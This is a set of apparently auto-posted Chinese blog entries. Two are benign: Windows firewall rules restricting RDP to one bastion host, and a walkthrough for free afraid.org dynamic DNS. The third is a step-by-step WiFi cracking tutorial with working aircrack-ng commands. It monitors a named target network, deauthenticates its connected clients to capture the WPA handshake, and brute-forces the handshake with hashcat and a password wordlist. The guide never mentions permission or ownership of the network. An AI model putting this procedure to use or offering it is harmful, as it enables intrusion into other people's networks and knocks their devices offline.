# 重置全部规则,只允许堡垒机访问3389
netsh advfirewall reset 
netsh advfirewall set allprofile state on 
NETSH ADVFIREWALL FIREWALL SET RULE all NEW enable=no
netsh advfirewall firewall add rule name="Allow baoleiji access 3389" dir=in protocol=TCP action=allow localport=3389  remoteip="10.153.127.110"

#查看所有支持IPv6的网卡
Get-NetAdapterBinding -ComponentID ms_tcpip6
#禁用所有网卡的IPv6协议
Disable-NetAdapterBinding -Name "*" -ComponentID ms_tcpip6
# 如果后面需要启用,执行: Enable-NetAdapterBinding -Name "*" -ComponentID ms_tcpip6

# 官方文档 https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd734783(v=ws.10)?redirectedfrom=MSDN
# 禁用规则 https://www.tenforums.com/tutorials/90033-enable-disable-ipv6-windows.html

bookmark_borderafraid.org注册free DDNS

Posted on by AutoPost
假如我现在有一个动态公网IP
想挂一个域名,这个域名每隔一段时间就刷新一次解析的IP,确保我能通过域名连上IP
访问 https://freedns.afraid.org 注册登录
点击 Subdomains:
新增一个子域名:
那73007300.mooo.com将指向1.1.1.1的IP。
注册完域名访问 https://freedns.afraid.org/dynamic/ 
可以看到,这里有很多方式可以更新域名的IP。
最简单的就是点开”quick cron example”,把example的最后一行添加到Linux crontab中,这样Linux服务器的公网IP就会被定时刷新到域名。
舒服~~~

bookmark_borderWIFI破解总结

Posted on by AutoPost
思路:
1. 抓包
2. 破解

1. 抓包

1.1. 搜集信息

准备一块支持监听模式的WIFI网卡,普通笔记本不支持,淘宝搜索 WIFI 渗透 网卡 就行了。
装上驱动,插上网卡。
切换到 monitor 或 managed 模式
#启动监控模式:(其它系统中网卡名字可能不同 通过iwconfig查看 )
ip link set wlan0 down
iwconfig wlan0 mode monitor
ip link set wlan0 up
airodump-ng wlan0 
#启动托管模式:
ip link set wlan0 down
iwconfig wlan0 mode managed
ip link set wlan0 up
#重要信息:在Vmware中使用Kali VM时:将Vmware中的USB设置从USB 2.0更改为USB 3.0。
确保没别的程序在用
airmon-ng check kill
查看网卡名字:
iwconfig
启动网卡:
airmon-ng start wlan0
搜集WIFI信息:
airodump-ng wlan0
主要搜集以下3个信息:
BSSID = AC:35:EE:15:8B:E2
网卡MAC地址,不用多说
CH = 6
信道
ESSID = DR-36670
WIFI名字
PWR 越大代表离得越近,-1代表不支持
Beacons 代表捕获到AP发的包数

1.2. 启动监听

模拟目标WIFI,启动监听:
airodump-ng --bssid AC:35:EE:15:8B:E2 -c 6 --write WPAcrack wlan0
-c 是 chanel的意思
–write 是保存抓到的数据包的名字
然后打开一个新的终端。

1.3. 抓握手包

强制让已连接的设备下线,重新握手:
aireplay-ng --deauth 100 -a AC:35:EE:15:8B:E2 wlan0
-c :指定用户的MAC地址
看2.的终端,
当右上角看到 handshake就代表抓到了:
图片下面代表的抓带了哪些设备的握手包。
抓到包,自动存到当前目录:
然后就可以把拿到的握手包去跑字典了。

2. 破解

2.1 CPU破解

用 AirCrack,这种方式比较慢。也有图形界面,比较简单粗暴。打开图形界面,设置好cap包和字典,还有WIFI类型,就可以跑了。
缺点是很慢。

2.2 GPU破解

hashcai可以用GPU跑字典实测用 RTX2060的显卡 比用 R7 2700的CPU快很多倍。
2.2.1 首先把cap转换成hccapx格式
在线转的网站:https://hashcat.net/cap2hccapx/
本地转的命令:
git clone https://github.com/hashcat/hashcat-utils.git
cd hashcat-utils/src
make
./cap2hccapx.bin /media/pcap/2603/2603-02.cap /media/pcap/2603/2603-02.hccapx
2.2.2 配置环境
下载 hashcat:
设置Windows内核参数,Linux环境忽略:
2.2.3 开始跑字典
.\hashcat.exe -a 3 -m 2500 -w 3 E:\********\********.hccapx E:\****\SecLists\Passwords\WiFi-WPA\probable-v2-wpa-top4800.txt
 这种的话会把每一次失败的尝试也打印出来,如果只想看成功的日志:
.\hashcat.exe -a 3 -m 2500 -w 3 E:\********\********.hccapx E:\****\SecLists\Passwords\WiFi-WPA\probable-v2-wpa-top4800.txt --quiet
-w 3 的意思是用很高的GPU 1最低 4最高。
-a 3 的是意思是暴力破解
-m 2500的意思是模式
关于用什么模式 参考:https://hashcat.net/wiki/doku.php?id=frequently_asked_questions#how_can_i_identify_the_hash_type
结果看当前目录的potfile:
这里有一个技巧,如果跑着跑着断了,比如强制关了,只要当前目录下还有.restore文件,就可以继续跑,而不用重新开始:
.\hashcat.exe --restore
如果说字典真的比较大,要跑很久,建议在参数中加上 –session 参数:
.\hashcat.exe -a 3 -m 2500 -w 3 E:\********\********.hccapx E:\****\SecLists\Passwords\WiFi-WPA\probable-v2-wpa-top4800.txt  --session test1 --quiet
即使中途退出了,使用如下命令就能恢复了:
hashcat --session test1 --restore